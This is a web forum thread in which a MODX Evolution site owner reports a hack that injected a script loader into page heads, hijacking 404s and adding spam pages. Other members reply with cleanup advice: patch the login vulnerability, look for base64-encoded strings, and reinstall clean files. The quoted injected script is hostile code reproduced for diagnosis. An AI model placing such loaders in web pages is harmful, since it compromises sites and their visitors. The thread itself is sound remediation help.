We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 40122
    • 330 Posts
    My site has been compromised and I had a list of links appear in my header. That was easy to resolve and find but there is some residual script appearing in the site.

    This appears directly below the <head> tag:

    <script type="text/javascript" src="http://www.mysite.com/home.html?getjs=metric.js"></script>
    <script type="text/javascript">var j1s = document.createElement('script');j1s.type = 'text/javascript';j1s.src = 'http://www.mysite.com/home.html?getjs=metric.js?getjs=metric.js';var h1ead = document.getElementsByTagName('head')[0];h1ead.appendChild(j1s);</script>


    What this seems to do is hijack my 404s and redirect them to another site. There are also a whole heap of links appearing when a search for my site in Google, eg:

    mysite.com/buy-viagra.html


    The script above does note appear in my database or my template or my third party Javascript plugins. I have no idea where it is coming from.

    I have reinstalled Evo and changed all passwords but it is still present. I have chekced my htaccess file and it looks fine. Of course I have also manually cleared the cache.

    Can anyone suggest anything to help me? I'm really lost as to what to do next.

    Thanks heaps.

    (PS, I am running Evo 1.0.5. I know it would probably help to upgrade it but my company refuses to upgrade their server so Im stuck with older versions).
      • 28042 ☆ A M B ☆
      • 24,524 Posts
      First, get rid of the "forgot password" link in the Manager login, or patch the accesscontrol.inc.php file. https://forums.modx.com/thread/80701/modx-evolution-1-0-6-and-prior-unauthorized-manager-access#dis-post-444667

      Those scripts are rarely openly inserted. Much more common is for them to be in a base64-encoded string. The thing to look for is something like this
      base64_decode('VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==');


      As far as your search engine results being poisoned, do you have a Webmaster Tools account? Once you're sure you have your site cleaned up, you can use that to get Google to re-index your site and get rid of all those bad links.

        Studying MODX in the desert - http://sottwell.com
        Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
        Join the Slack Community - http://modx.org
        • 2762
        • 1,198 Posts
        I had a similar problem a few months ago. There was a couple of snippets and plugins with hacked code


        1) Manager:


        - Delete all unused plugins and snippets (like FlexSearch Form) in modx resource manager
        - Overwrite with the original code all 3d party snippets and plugin you still uses

        2) Ftp:
        - delete files/folders of old snippets versions (like old AjaxSearch folder)
        - delete and reupload all 3d party snippet files/folders (assets/snippets/snippetfolder) with original files
        - upload clean/fresh modx files

        or:
        (better)
        - download your site
        - delete all files on remote server
        - upload clean/fresh modx files
        - upload clean version of 3d party snippets/plugins files
        - upload your images, media and templates (after doing a check for extraneous files)
        - upload a checked or a clean version of your config.inc


        3) Manager:

        - Setup/install Modx and ovewrite core snippets/plugins
        - "just to be sure" change your admin password again smiley


          Free MODx Graphic resources and Templates www.tattoocms.it
          -----------------------------------------------------

          MODx IT  www.modx.it
          -----------------------------------------------------

          bubuna.com - Web & Multimedia Design